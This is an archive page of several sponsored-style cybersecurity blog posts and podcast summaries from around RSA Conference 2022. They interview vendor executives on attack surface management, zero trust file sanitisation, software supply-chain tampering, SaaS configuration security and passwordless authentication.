Category: Podcasts

Reducing the attack surface of a company’s network should, by now, be a top priority for all organizations.

Related: Why security teams ought to embrace complexity

As RSA Conference 2022 gets underway today in San Francisco, advanced systems to help companies comprehensively inventory their cyber assets for enhanced visibility to improve asset and cloud configurations and close security gaps will be in the spotlight.

As always, the devil is in the details. Connecting the dots and getting everyone on the same page remain daunting challenges. I visited with Erkang Zheng, founder and CEO of JupiterOne, to discuss how an emerging discipline — referred to as “cyber asset attack surface management,” or CAASM – can help with this heavy lifting.

Based in Morrisville, NC, JupiterOne launched in 2020 and last week announced that it has achieved a $1 billion valuation, with a $70 million Series C funding round.

For a full drill down, please give the accompanying podcast a listen. Here are my takeaways:

Imposing context

Remediating security gaps in modern networks, not surprisingly, can quickly devolve into a tangled mess. Both the technology and the teams responsible for specific cyber assets tend to operate in silos. And because network security teams lack direct control, coordinating people, policies and infrastructure scattered across the organization has become impossible to get done in a timely manner.

This is more so true as organizations accelerate cloud migration and dive deeper into an interconnected digital ecosystem. Software-defined everything is the mantra and mushrooming complexity is the result. On the flip side, security gaps are multiplying as network attack surfaces expand exponentially. These gaps must be closed or digital transformation will be in danger of stalling out.

Enter CAASM which is designed to make it possible for security teams to impose context on the ephemeral connections flying between things like microservices, virtual storage and hosted services. JupiterOne’s platform, for instance, puts a security lens on discovering, managing and governing all types of cyber assets — from software in development to all aspects of private cloud and public cloud IT infrastructure.

CAASM systems leverage APIs to help security teams gain comprehensive visibility of all components of IT infrastructure be they on-premises or in a private, public or hybrid cloud. This enables the implementation of granular policies that can be enforced, at scale, and that each organization can dial in to boost security without unduly hindering agility.

This is the heavy lifting that’s easier said than done, especially in a massively-distributed, fast-changing operating environment. The pressure bears down on security teams from two directions, Zheng says. They must do as much as they can to directly prevent intrusions; and they must also rally the asset owners to prevent breaches as well as respond with alacrity to security incidents as they crop up.

Smart questions

Connecting the dots and getting everyone on the same page comes down to asking the right questions, Zheng observes. And cloud-hosted, data analytics technology is now readily available to ask smart questions about network security, at scale, and get actionable answers.

Zheng

“The concept is simple, but the execution is not,” he says. The first obstacle is the underlying technology; networking infrastructure components come from hundreds of different vendors, each using a proprietary implementation. Then there’s the issue of having to change the behaviors of the asset owners, many of whom are stuck in a siloed mindset.

JupiterOne’s solution prepares the way by discovering, normalizing and consolidating  basic information about all cyber assets, such as what the asset is, who owns it and who can access it. This creates a scenario where the security team can ask simple questions that can and should be directly answered.

“Know what you have and focus on what matters,” Zheng told me. “It really boils down to that.”

By focusing on common-sense questions, legacy workflows can be altered in a way that keeps pace with a fast-changing digital ecosystem – and recalcitrant asset owners will be more likely to take charge of facilitating remediation, he says.

“We can help provide a workflow that focuses on questions like, ‘How do I fix it?’ ‘Who can fix it?’ ‘How do I notify, assign and track and verify?’ ” Zheng observes. “The security team really is the gatekeeper and the auditor and a consultant, to some extent, to the people who must actually do the work . . . CAASM is not only a data platform and an analytical platform, but also a collaboration platform.”

Solutions at hand

Collaborating to swiftly close severe zero-day security gaps that regularly get disclosed, like Log4J, has become a must-have capability, for obvious reasons. Yet there is a much greater impact CAASM systems could have, going forward. CAASM is one slice of a new security architecture that’s taking shape, one in which companies begin to systematically discover and remediate security gaps – gaps threat actors are proactively seeking out.

Zheng walked me through an example of how easy it is for a security team to overlook gaps created, for instance, in the mixing and matching of cloud resources leased from Amazon Web Services:

“Let’s say you have an internal resource that’s not configured to be public facing by itself. However, you have an external-facing workload that has an authentication policy giving it API level access . . . it could be an instance where you have an Internet-facing Lambda function that’s given access to an internal S3 bucket or DynamoDB table. That’s a specific example of identifying a security gap that you previously didn’t see.”

This technical detail vividly illustrates attack surface expansion in action. There are countless more examples like this. Companies absolutely should begin flushing out security gaps and remediating them. The technology to do this at scale and in a timely manner are at hand.

The sooner closing gaps rises to a standard best practice, the more secure we’ll all be. I’ll keep watch and keep reporting.

Acohido

Pulitzer Prize-winning business journalist Byron V. Acohido is dedicated to fostering public awareness about how to make the Internet as private and secure as it ought to be.

(LW provides consulting services to the vendors we cover.)

 

Pity the poor CISO at any enterprise you care to name.

Related: The rise of ‘XDR’

As their organizations migrate deeper into an intensively interconnected digital ecosystem, CISOs must deal with cyber attacks raining down on all fronts. Many are working with siloed security products from another era that serve as mere speed bumps. Meanwhile, security teams are stretched thin and on a fast track to burn out.

Help is on the way. At RSA Conference 2022, which opened today in San Francisco, new security frameworks and advanced, cloud-centric security technologies will be in the spotlight. The overarching theme is to help CISOs gain a clear view of all cyber assets, be able to wisely triage exposures and then also become proficient at swiftly mitigating inevitable breaches.

Easier said than done, of course. I had the chance to discuss this with Lori Smith, director of product marketing at Trend Micro. With $1.7 billion in annual revenue and 7,000 employees, Trend Micro is a prominent leader in the unfolding shift towards a more holistic approach to enterprise security, one that’s a much better fit for the digital age. For a full drill down on our discussion, please give the accompanying podcast a listen. Here are key takeaways.

Beyond silos

It was only a few short years ago that BYOD and Shadow IT exposures were the hot topics at RSA. Employees using their personally-owned smartphones to upload cool new apps presented a nightmare for security teams.

Fast forward to today. Enterprises are driving towards a dramatically scaled-up and increasingly interconnected digital ecosystem. The attack surface of company networks has expanded exponentially, and fresh security gaps are popping up everywhere.

What’s more, the rapid rise of a remote workforce, in the wake of Covid 19, has only served to accelerate cloud migration, as well as scale up the attendant network exposures. Unmanaged smartphones and laptops, misconfigured Software as a Service (SaaS) apps, unsecured Internet access present more of an enterprise risk than ever.

“The increased number of these cyber assets means that there’s more cyber assets that can potentially be vulnerable,” Smith says. “This opens up an even bigger and more profitable attack surface that cybercriminals are only too eager to target and exploit.”

Smith

In this hyperkinetic environment, a harried CISO needs to be able to visualize risk from a high level — as if it were moving in slow motion – and then make smart, strategic decisions. No single security solution now does this; there is no silver bullet. And the usual collection of security tools – firewall, endpoint detection, intrusion detection, SIEM, etc. – typically arranged as siloed layers to protect on-premise networks, falls short as well, Smith says.

See, assess, mitigate

In life, solving any complex challenge often comes down to going back to basics. Enterprises can head down several viable paths to start doing this, with respect to network security. Trend Micro is in the camp advocating that a more holistic security posture can be attained through securing three fundamental capabilities.

The first is the ability to see everything. Enterprises need to gain a crystal-clear view of every component of on-premises, private cloud and public cloud IT infrastructure, Smith says. This is not a snapshot; it’s more of a process of continuously discovering evolving tools, services and behaviors, she says.

Observes Smith: “This is about gaining visibility into all cyber assets, internal and external, and answering questions like, ‘What is my attack surface?’ and ‘How well can I see all the assets in my environment?’ ‘How many assets do I have?’ ‘What types?’ ‘What kinds of profiles do my assets have and how is that changing over time?’”

Discovering and continuously monitoring all cyber assets enables the second essential capability: doing strategic risk assessments to gain important insight into the status of their cyber risks and security posture. Need a roadmap? CISOs need only to follow the principles honed over the past 200 years by the property and casualty insurance industry.

It comes down to taking an informed approach to triaging cyber exposures, Smith says. Organizations need better insight in order to prioritize those actions that will help them reduce their risk the most. It helps identify the security controls that should be in place as appropriate for that cyber asset. For example, strong authentication and least privileged access should be essential for sensitive assets but may be unnecessary for benign assets.

The third capability has to do with mitigating risks. Data analytics and automation can very effectively be applied to dialing in the optimum mix of security and agility, at scale. “This is about applying the right controls,” Smith says. “Whether that’s automated remediation action using security playbooks or prioritizing and proactively implementing recommended actions to lower risk.”

Towards holistic security

It’s remarkable – and telling – that Trend Micro got its start in 1988 as the supplier of a siloed security product: antivirus software. The company has evolved to stay in step with the evolution of network architectures and a threat landscape in which threat actors always seem to operate several steps ahead of security teams.

Trend Micro One, its unified security platform, along with its XDR capabilities, represent the latest iteration of its product strategy. Consolidating native Trend Micro tools and services with partner solution integrations will help enterprises put aside their siloed defense mentality and achieve comprehensive security in a powerful way.

“For effective security, you must have protection, detection, and response in place,” Smith says. “And you must have that continuous attack surface discovery and risk assessment so that you are prioritizing your actions and optimizing your security controls appropriately . . . I think that’s why we’re seeing security platforms, in general, gaining traction; because today’s environment requires that holistic approach.”

The rise of security platforms optimized for modern networks is an encouraging development. It’s early; there’s more to come. I’ll keep watch and keep reporting.

Acohido

Pulitzer Prize-winning business journalist Byron V. Acohido is dedicated to fostering public awareness about how to make the Internet as private and secure as it ought to be.

(LW provides consulting services to the vendors we cover.)

The zero trust approach to enterprise security is well on its way to mainstream adoption. This is a very good thing.

Related: Covid 19 ruses used in email attacks

At RSA Conference 2022, which takes place next week in San Francisco, advanced technologies to help companies implement zero trust principals will be in the spotlight. Lots of innovation has come down the pike with respect to imbuing zero trust into two pillars of security operations: connectivity and authentication.

However, there’s a third pillar of zero trust that hasn’t gotten quite as much attention: directly defending data itself, whether it be at the coding level or in business files circulating in a highly interconnected digital ecosystem. I had a chance to discuss the latter with Ravi Srinivasan, CEO of  Tel Aviv-based Votiro which launched in 2010 and has grown to  .

Votiro has established itself as a leading supplier of advanced technology to cleanse weaponized files. It started with cleansing attachments and weblinks sent via email and has expanded to sanitizing files flowing into data lakes and circulating in file shares. For a full drill down on our discussion, please give the accompanying podcast a listen. Here are key takeaways.

Digital fuel

Votiro’s new cloud services fit as a pillar of zero trust that is now getting more attention: directly protecting digital content in of itself. Zero trust, put simply, means eliminating implicit trust. Much has been done with connectivity and authentication. By contrast, comparatively little attention has been paid to applying zero trust directly to data and databases, Srinivasan observes. But that needs to change, he says. Here’s his argument:

Companies are competing to deliver innovative digital services faster and more flexibly than ever. Digital content creation is flourishing with intellectual property, financial records, marketing plans and legal documents circulating within a deeply interconnected digital ecosystem.

Digital content has become the liquid fuel of digital commerce—and much of it now flows into and out of massive data lakes supplied by Amazon Web Services, Microsoft Azure and Google Cloud. This transition happened rapidly, with scant attention paid to applying zero trust principles to digital content.

However, a surge of high-profile ransomware attacks and supply chain breaches has made company leaders very nervous. “I speak to a lot of security leaders around the world, and one of their biggest fears is the rapid rise of implementing data lakes and the fear that the data lake will turn into a data swamp,” Srinivasan says.

Votiro’s technology provides a means to sanitize weaponized files at all of the points where threat actors are now trying to insert them. It does this by permitting only known good files into a network, while at the same time  extracting unknown and untrusted elements for analysis. Votiro refined this service, cleansing weaponized attachments and web links sent via email, and has extended this service to cleansing files as they flow into a data lake and as they circulate in file shares. 

Exploiting fresh gaps

As agile, cloud-centric business communications has taken center stage, cyber criminals quite naturally have turned their full attention to inserting weaponized files wherever it’s easiest for them to do so, Srinivasan observes. As always, the criminals follow the data, he says.

Srinivasan

“The trend that we’re seeing is that more than 30 percent of the content flowing into data lakes is from untrusted sources,” he says. “It’s documents, PDFs, CSV files, Excel files, images, lots of unstructured data; we track 150 different file types . . . we’re seeing evasive objects embedded in those files designed to propagate downstream within the enterprise.”

This is the dark side of digital transformation. Traditionally, business applications tapped into databases kept on servers in a temperature-controlled clean room — at company headquarters. These legacy databases were siloed and well-protected; there was one door in and one door out.

Data – i.e. coding and content — today fly around intricately connected virtual servers running in private clouds and public clouds. As part of this very complex, highly distributed architecture, unstructured data flows from myriad sources into and back out of partner networks, cloud file shares and data lakes. This in-flow and out-flow happens via custom-coded APIs configured by who knows whom.

Votiro’s cleansing scans work via an API that attaches to each channel of content flowing into a data lake. This cleansing process is shedding light on the fresh security gaps cyber criminals have discovered – and have begun exploiting, Srinivasan says.

Evolving attacks

He told me about this recent example: an attacker was able to slip malicious code into a zip file sent from an attorney to a banking client in a very advanced way. The attacker managed to insert attack code into a zip file contained in a password-protected email message – one that the banker was expecting to receive from the attorney.

At a fundamental level, this attacker was able to exploit gaps in the convoluted matrix of interconnected resources the bank and law firm now rely on to conduct a routine online transaction. “Bad actors are constantly evolving their techniques to compromise the organization’s business services,” Srinivasan says.

Closing these fresh gaps requires applying zero trust principles to the connectivity layer, the authentication layer — and the content layer, he says. “What we’re doing is to deliver security as a service that works with the existing security investments companies have made,”  Srinivasan  says. “We integrate with existing edge security and data protection capabilities as that final step of delivering safe content to users and applications at all times.”

It’s encouraging that zero trust is gaining material traction at multiple layers. There’s a lot more ground to cover. I’ll keep watch and keep reporting.

Acohido

Pulitzer Prize-winning business journalist Byron V. Acohido is dedicated to fostering public awareness about how to make the Internet as private and secure as it ought to be.

(LW provides consulting services to the vendors we cover.)

It’s not difficult to visualize how companies interconnecting to cloud resources at a breakneck pace contribute to the outward expansion of their networks’ attack surface.

Related: Why ‘SBOM’ is gaining traction

If that wasn’t bad enough, the attack surface companies must defend is expanding inwardly, as well – as software tampering at a deep level escalates.

The Solar Winds breach and the disclosure of the massive Log4J vulnerability have put company decision makers on high alert with respect to this freshly-minted exposure. Findings released this week by ReversingLabs show 87 percent of security and technology professionals view software tampering as a new breach vector of concern, yet only 37 percent say they have a way to detect it across their software supply chain.

I had a chance to discuss software tampering with Tomislav Pericin, co-founder and chief software architect of ReversingLabs, a Cambridge, MA-based vendor that helps companies granularly analyze their software code. For a full drill down on our discussion please give the accompanying podcast a listen. Here are the big takeaways:

‘Dependency confusion’

Much of the discussion at RSA Conference 2022, which convenes next week in San Francisco, will boil down to slowing attack surface expansion. This now includes paying much closer attention to the elite threat actors who are moving inwardly to carve out fresh vectors taking them deep inside software coding.

The perpetrators of the Solar Winds breach, for instance, tampered with a build system of the widely-used Orion network management tool. They then were able to trick some 18,000 companies into deploying an authentically-signed Orion update carrying a heavily-obfuscated backdoor.

Log4J, aka Log4Shell, refers to a gaping vulnerability that exists in an open-source logging library that’s deeply embedded within servers and applications all across the public Internet. Its function is to record events in a log for a system administrator to review and act upon. Left unpatched, Log4Shell, presents a ripe opportunity for a bad actor to carry out remote code execution attacks, Pericin told me.

This type of attack takes advantage of the highly dynamic, ephemeral way software interconnects to make modern digital services possible.

Pericin

“As we go about defining layers on top of layers of application code, understanding all the interdependencies becomes very complex,” Pericin told me. “You really need to go deep into all of these layers to be able to understand if there’s any hidden behaviors or unaccounted for code that introduce risk in any of the layers.”

Obfuscated tampering

Dependency confusion can arise anytime a developer reaches out to a package repository. Modern software is built on pillars of open-source components, and package repositories offer an easy access to the wealth of pre-built code that makes development faster. However, not all of that code is safe to use. Capitalizing on dependency confusion, threat actors seek ways to insert malicious elements; and they take intricate steps to obfuscate their code tampering. Most often their objective is to install a back door through which they can come and go – and take full control of the underlying system anytime they please, Pericin says.

Last year, white hat researcher Alex Birsan shed a bright light on just how big an opportunity this presents to malicious hackers. Birsan demonstrated how dependency confusion attacks could be leveraged to tamper with coding deep inside of system software at Apple, PayPal, Tesla, Netflix, Uber, Shopify and Yelp!.

Then in late April, ReversingLabs and other vendors shared stunning evidence of such attacks moving beyond the theoretical and into live service. A red team of security researchers dissected a dependency confusion campaign aimed at taking control of the networks of leading media, logistics and industrial firms in Germany.

The basic definition of software tampering, Pericin notes, is to insert unverified code into the authorized code base. In the current, operating environment, there’s limitless opportunity to tamper with code. This is because such a high premium is put on agility.

“There are many places in the software supply chain where you can add unverified code, and the attackers are actually doing that,” Pericin says. “And that’s also why it can be so hard to detect.”

Implementing SBOM

Even as their organizations push more operations out to the Internet edge, senior executives are starting to realize that their internal attack surface is riddled with security holes, as well. Some 98 percent of the respondents to the ReversingLabs poll acknowledged that software supply chain risks are rising – due to their intensive use of built-on third party code and open source code. However, only 51 percent believed they could prevent their software from being tampered with.

For its part, ReversingLabs supplies an advanced code scanning and analysis service, called Software Assurance, that can help companies verify that its applications haven’t been tampered with. Software developers at large shops are getting into the habit of using this tool to deeply scan software packages as a final quality check, just before deployment, Pericin told me.

Some companies are going so far as using this tool to selectively scan mission-critical software arriving from smaller houses and independent developers for behavioral oddities, as well, he says.

Having the ability to granularly scan code also plays well with the drive to mainstream SBOM, which stands for Software Bill of Materials.

SBOM is an industry effort to standardize the documentation of a complete list of authorized components in a software application.

President Biden’s cybersecurity executive order, issued in May, includes a detailed SBOM requirement for all software delivered to the federal government.

And now advanced scanning tools, like those supplied by ReversingLabs, are ready for prime time – to help companies detect and deter software tampering, as well as implement SBOM as a standard practice.

“One of the outcomes of doing this analysis is you gain the ability to correctly identify what’s present in the software package, which is the software bill of materials,” Pericin observes.

In today’s environment, organizations need to figure out how to secure their external edge, that’s for certain. But it’s equally important to account for their internal edge, to stop software tampering in its tracks. It’s encouraging that the technology to do that is available. I’ll keep watch and keep reporting.

Acohido

Pulitzer Prize-winning business journalist Byron V. Acohido is dedicated to fostering public awareness about how to make the Internet as private and secure as it ought to be.

(LW provides consulting services to the vendors we cover.)

 

 

Companies have come to depend on Software as a Service – SaaS — like never before.

Related: Managed security services catch on

From Office 365 to Zoom to Salesforce.com, cloud-hosted software applications have come to make up the nerve center of daily business activity. Companies now reach for SaaS apps for clerical chores, conferencing, customer relationship management, human resources, salesforce automation, supply chain management, web content creation and much more, even security.

This development has intensified the pressure on companies to fully engage in the “shared responsibility” model of cybersecurity, a topic in that will be in the limelight at RSA Conference 2022 next week in San Francisco.

I visited with Maor Bin, co-founder and CEO of Tel Aviv-based Adaptive Shield, a pioneer in a new security discipline referred to as SaaS Security Posture Management (SSPM.) SSPM is part of emerging class of security tools that are being ramped up to help companies dial-in SaaS security settings as they should have started doing long ago.

This fix is just getting under way. For a full drill down, please give the accompanying podcast a listen. Here are the key takeaways:

Shrugging off security

A sharp line got drawn in the sand, some years ago, when Amazon Web Services (AWS) took the lead in championing the shared responsibility security model.

To accelerate cloud migration, AWS, Microsoft Azure and Google Cloud guaranteed that the hosted IT infrastructure they sought to rent to enterprises would be security-hardened – at least on their end. For subscribers, the tech giants issued a sprawling set of security settings for their customers’ security teams to monkey with. It was left up to each company to dial-in just the right amount of security-vs-convenience.

SaaS vendors, of course, readily adopted the shared responsibility model pushed out by the IT infrastructure giants. Why wouldn’t they? Thus, the burden was laid squarely on company security teams to harden cloud-connections on their end.

Bin

What happened next was predictable. Caught up in chasing the productivity benefits of cloud computing, many companies looked past  doing any security due diligence, Bin says.

Security teams ultimately were caught flat-footed, he says. Security analysts had gotten accustomed to locking down servers and applications that were on premises and within their arms’ reach. But they couldn’t piece together the puzzle of how to systematically configure myriad overlapping security settings scattered across dozens of SaaS applications.

The National Institute of Standards and Technology recognized this huge security gap for what it was, and issued NIST 800-53 and NIST 800-171 –detailed criteria for securely configuring cloud connections. But many companies simply shrugged off the NIST protocols.

“It turned out to be very hard for security teams to get control of SaaS applications,” Bin observes.  “First of all, there was a lack of any knowledge base inside companies and often times the owner of the given SaaS app wasn’t very cooperative.”

SaaS due diligence

Threat actors, of course, didn’t miss their opportunity. Wave after wave of successful exploits took full advantage of the misconfigurations spinning out of cloud migration. Fraudulent cash transfers, massive ransomware payouts, infrastructure and supply chain disruptions all climbed to new heights. And malicious hackers attained deep, unauthorized access left and right. Every CISO should, by now, cringe at the thought of his or her organization becoming the next Capital One or Solar Winds or Colonial Pipeline.

At RSA Conference 2022, which opens next week in San Francisco, the buzz will be around the good guys finally getting their act together and pushing back. For instance, an entire cottage industry of cybersecurity vendors has ramped up specifically to help companies improve their cloud “security posture management.”

This includes advanced cloud access security broker (CASB) and cyber asset attack surface management (CAASM) tools.  SSPM solutions, like Adaptive Shield’s, are among the newest and most innovative tools. Other categories getting showcased at RSAC 2022 include cloud security posture management (CSPM) and application security posture management (ASPM) technologies.

For its part, Adaptive Shield supplies a solution designed to provide full visibility and control of every granular security configuration in some 70 SaaS applications now used widely by enterprises. This can range from dozens to hundreds of security toggles, per application, controlling things like privileged access, multi-factor authentication, phishing protection, digital key management, auditing and much more.

Tools at hand

Security teams now have the means to methodically filter through and make strategic adjustments of each and every SaaS security parameter. Misconfigurations – i.e. settings that don’t meet NIST best practices — can be addressed immediately, or a service ticket can be created and sent on its way.

“I like to call this SaaS security hygiene,” Bin says. “It’s a way to align your users, your devices and your third-party applications with different activities and different privileges. Misconfigurations is huge part of it, but it’s just one of the moving parts of securing your SaaS.”

Doing this level of SaaS security due diligence on a consistent basis is clearly something well worth doing and something that needs to become standard practice. It will steadily improve an organization’s cloud security policies over time; and it should also promote security awareness and reinforce security best practices far beyond the security team, namely to the users of the apps.

Company by company this will slow the expansion of the attack surface, perhaps even start to help shrink the attack surface over time. Things are moving in a good direction. I’ll keep watch and keep reporting.

Acohido

Pulitzer Prize-winning business journalist Byron V. Acohido is dedicated to fostering public awareness about how to make the Internet as private and secure as it ought to be.

(LW provides consulting services to the vendors we cover.)

Google, Microsoft and Apple are bitter arch-rivals who don’t often see eye-to-eye.

Related: Microsoft advocates regulation of facial recognition tools

Yet, the tech titans recently agreed to adopt a common set of standards supporting passwordless access to websites and apps.

This is one giant leap towards getting rid of passwords entirely. Perhaps not coincidently, it comes at a time when enterprises have begun adopting passwordless authentication systems in mission-critical parts of their internal operations.

Excising passwords as the security linchpin to digital services is long, long overdue. It may take a while longer to jettison them completely, but now there truly is a light at the end of the tunnel.

I recently sat down with Ismet Geri, CEO of Veridium, to discuss what the passwordless world we’re moving towards might be like. For a full drill down on our wide-ranging discussion, please give a listen to the accompanying podcast. Here are a few takeaways.

Security + efficiency

Passwordless technology is certainly ready for prime time; innovative solutions from suppliers like Cisco’s Duo, Hypr, OneLogin and Veridium have been steadily gaining traction in corporate settings for the past few years.

And the pace of adoption is quickening, Geri told me. Companies in the throes of digital transformation, and especially post Covid19, have never been more motivated to adapt a new authentication paradigm – one that eliminates shared secrets.

Password abuse at scale arose shortly after the decision got made in the 1990s to make shared secrets the basis for securing digital connections. Fortifications, such as multi-factor authentication (MFA) and password managers, proved to be mere speed bumps. Threat actors now routinely bypass these second-layer security gates.

No small part of the problem is that passwords and MFA require a significant amount of human interaction. “Relying on shared secrets doesn’t work anymore, because we have too many accounts and no one can remember hundreds of passwords.” Geri says. “Our brains just won’t do it.”

As companies accelerate their dependence on hosted cloud services, the clunkiness of passwords and MFA is exacting a toll on productivity. One bank in the U.S. Northeast, for instance, was concerned about tellers having to type-in their passwords 50 or more times a day. “They wanted to make their tellers’ work life easier, more friendly and seamless, and at the same time improve security,” Geri says.

This was accomplished by using web cameras at each terminal tied into Veridium facial recognition software. Instead of the teller having to type in a username and password, then also use a second-factor of authentication over and over, access now happens silently and swiftly based on who the teller is. Thus, the bank measurably reduced its exposure to password abuse, while also lightening the burden on each teller.

Adoption scenarios

Geri

Outside of the banking industry, which strictly prohibits the use of BYOD smartphones for tellers, many organizations have begun adopting passwordless solutions by leveraging their employees’ personally-owned smartphones. Passwordless access to company resources goes something like this: Instead of a logon prompt asking for a username and password, the employee gets presented with a QR Code.

He or she simply uses his or her smartphone to scan the QR code. A phone app then uses the onboard biometric sensor, either fingerprint or facial, to authenticate the employee to the company’s server. “The most common adoption scenario that we see is companies seeking a passwordless experience across all of their applications,” Geri says.

Talk about turning Bring Your Own Device security concerns on its head. Passwordless solutions now enable companies to turn BYOD into a strategic tool. When you consider how password abuse has grown into a full-blown criminal specialty, it’s easy to measure the security gained from shutting down password abuse vectors.

The efficiency gain comes from reducing logon sprawl; today employees are required to repeatedly type-in a username and password, then also use various forms of MFA to connect to the company network, to log onto cloud-hosted productivity and collaboration tools, as well as to access operational software.

Coming advances

In short, what’s happening is that companies are shifting to passwordless authenticators because they materially improve security, but also leverage tools like a smartphone which is far less likely to be left behind or misplaced.

Google, Microsoft and Apple now get this. After a decade of sitting on the fence, the tech giants on May 5 announced that they would formally adopt standards pulled together by the FIDO Alliance.

FIDO stands for Fast IDentity Online. It’s a fresh set of industry standards, akin to WiFi and Bluetooth, that encourages the development and use of passwordless authenticators. Any device manufacturer, software developer or online service provider can integrate FIDO protocols and policies into their products and services.

Whatever their ulterior motives, Google, Microsoft and Apple should be congratulated for finally seeing the light. They’ve dispatched spokesmen to herald the “eliminating the vulnerability of passwords” and tout “making passwordless part of consumer lives” and “completing the shift to a passwordless world.” Maybe the tech giants finally noticed the train leaving and thought it wise to jump on board.

For its part, Veridium launched in 2016 with a laser focus on designing passwordless systems from scratch that directly addressed the growing frustration of IT department and security team leaders.

Attaining ‘recognition’

Geri told me that Veridium is already three years into development of a major advance – technology that can take into account behavioral biometrics, such as the pattern of hand movement a person habitually uses when using a fingerprint or iris sensor.

By remembering nuances about movements and other behavior traits over time, this technology will make Veridium’s platform swifter and surer about authenticating a user, Geri told me.

“It’s a concept I call recognition,” he says. “Behavior patterns combined with a strong authentication asset, which is your biometrics, could get us very close to starting to recognize you.”

More such advances are coming. How they get used in a global sense remains to be seen.

Will passwordless authenticators serve mainly to tighten the iron grip that the social media giants hold on consumers’ online personas? Or could these advances foster a fresh trend, one that supports a more fair distribution of wealth, say like the mainstreaming of self-sovereign identities? We’re destined to soon find out. I’ll keep watch and keep reporting.

Acohido

Pulitzer Prize-winning business journalist Byron V. Acohido is dedicated to fostering public awareness about how to make the Internet as private and secure as it ought to be.

The shift to software-defined everything and reliance on IT infrastructure scattered across the Internet has boosted corporate productivity rather spectacularly.

Related: Stopping attack surface expansion

And yet, the modern attack surface continues to expand exponentially, largely unchecked. This dichotomy cannot be tolerated over the long run.

Encouragingly, an emerging class of network visibility technology is gaining notable traction. These specialized tools are expressly designed to help companies get a much better grip on the sprawling array of digital assets they’ve come to depend on. Gartner refers to this nascent technology and emerging discipline as “cyber asset attack surface management,” or CAASM.

I sat down with Erkang Zheng, founder and CEO of JupiterOne, a Morrisville, NC-based CAASM platform provider, to discuss how security got left so far behind in digital transformation – and why getting attack surface management under control is an essential first step to catching up.

For a full drill down, please give the accompanying podcast a listen. Here are my takeaways:

Shoring up fast-and-risky

For most of the past 25 years, company networks were made up of clearly defined internal boundaries encompassed by a hard-and-fast perimeter. And the role of the security team was straightforward: defend the network, protect IT.

But then along came digital transformation. Internal and external network boundaries gave way to agile software development and everything-as-a-hosted-service. Organizations today move as fast as they can, expect to break things and count on iterating improvements on the fly. Fast-and-risky has become the working definition of software innovation.

Rock star developers in cutting-edge organizations are encouraged to make things happen. They live-and-die by the tenants of open-source and DevOps and lean on cloud-native IT infrastructure. Accelerating complexity has been the result.

The problem with following the fast-and-risky mantra is that many failures turn out to be architectural in nature, are not easy to fix and can all too easily escape notice or, worse, be ignored. Meanwhile, security teams, for the most part, have been stuck in a legacy mindset of striving to keep things as simple and as consistent as possible, Erkang observes.

And this, he argues, is where threat actors foment chaos. It seems ludicrous, but in one sense it’s easier than ever for malicious hackers to get deep access, steal data, spread ransomware, disrupt infrastructure and gain long-run unauthorized access.

Zheng

“There’s a fundamental disconnect between what the business wants and what the security team wants,” Erkang told me. “And this is where the chaos comes from . . . the bad guy hackers aren’t necessarily taking advantage of the complexity; they’re really taking advantage of this disconnect.”

Embracing complexity

The opportunity, going forward then, is for security to jump fully onboard the digital transformation bandwagon.

Legacy defenses at the gateway, firewall, endpoint and application levels must be rearchitected and scaled-up. That’s what a passel of emerging security frameworks like Zero Trust Network Access (ZTNA,) Cloud Workload Protection Platform (CWPP,) Cloud Security Posture Management (CSPM) and Secure Access Service Edge (SASE) are all about. Network security must be architected to effectively blunt non-stop malicious probing and cut-off the breaches enabled in a fast-and-risky operating environment.

At the same time, the expansion of the attack surface somehow needs to be slowed — and ultimately reversed. And this is where CAASM technology and practices come in – by fostering cyber hygiene on the ground floor.

Erkang is in the camp making the argument that security teams have an opportunity to lead the way by not merely tolerating complexity but by embracing it. “Security needs to focus on supporting innovation and advancement by understanding complexity; this is now possible with data, with automation and with an engineering mindset,” he says.

Anything and everything that supports any element of digital operations ought to be considered a cyber asset that needs constant care and feeding — with security top of mind, he says. CAASM technology leverages APIs to make it possible for security teams to impose context on the ephemeral connections flying between things like microservices, virtual storage and hosted services.

With context, granular policies can then be set in place and enforced. Machine learning and automation can be brought to bear in a way that infuses security without unduly hindering agility. A lot can be gained by simply imposing wise configuration of all cyber assets, Erkang says. What’s more, this same level of granular analysis and policy enforcement can — and should — be directed at identifying, monitoring and patching software vulnerabilities, he argues.

Taking the security angle

In one sense, taming complexity is all about understanding context. Erkang makes a strong argument that the best way for an organization to gain actionable understanding of its cyber assets in a fast-and-risky operating environment is to come at it from the security perspective.

Erkang gave me the example of a company seeking to take stock of its cloud data stores. Let’s say an organization wants to more proactively manage its Amazon Web Services S3 buckets. JupiterOne, in this scenario, would assemble and maintain a detailed catalogue of the configuration status of all these assets.

Granular policies could then be enforced that consider the sensitivity of data held in any given S3 bucket, as well as the associated access privileges. These are privileges that often are allowed by default to cascade across several tiers of user groups — in support of the go-fast-and-break mindset. Tightening these privileges with just the right touch shrinks the attack surface.

According to Gartner, CAASM capabilities can help companies “improve basic security hygiene by ensuring security controls, security posture and asset exposure are understood and remediated across the environment.”

It strikes me that the beauty of this is that improving visibility is more about creating operational effectiveness, strengthening security and lowering risk for organizations is also paving the way for more effective cyber asset management.

“Security needs to transform from an enforcing function to a business enabling and a wellness function,” Erkang says. “Understanding your cyber assets and how all the dots connect can be the starting point to proactively manage different functions, not just within security, but also outside of security, as well.”

It’s notable that an unprecedented number of fresh security frameworks are vying for traction at the moment. For company decision-makers, this can be confusing. But the effort to sort things and determine what works best for their organization is well worth it. This is all part of raising the security bar. CAASM could be a cornerstone. I’ll keep watch and keep reporting.

Acohido

Pulitzer Prize-winning business journalist Byron V. Acohido is dedicated to fostering public awareness about how to make the Internet as private and secure as it ought to be.

(LW provides consulting services to the vendors we cover.)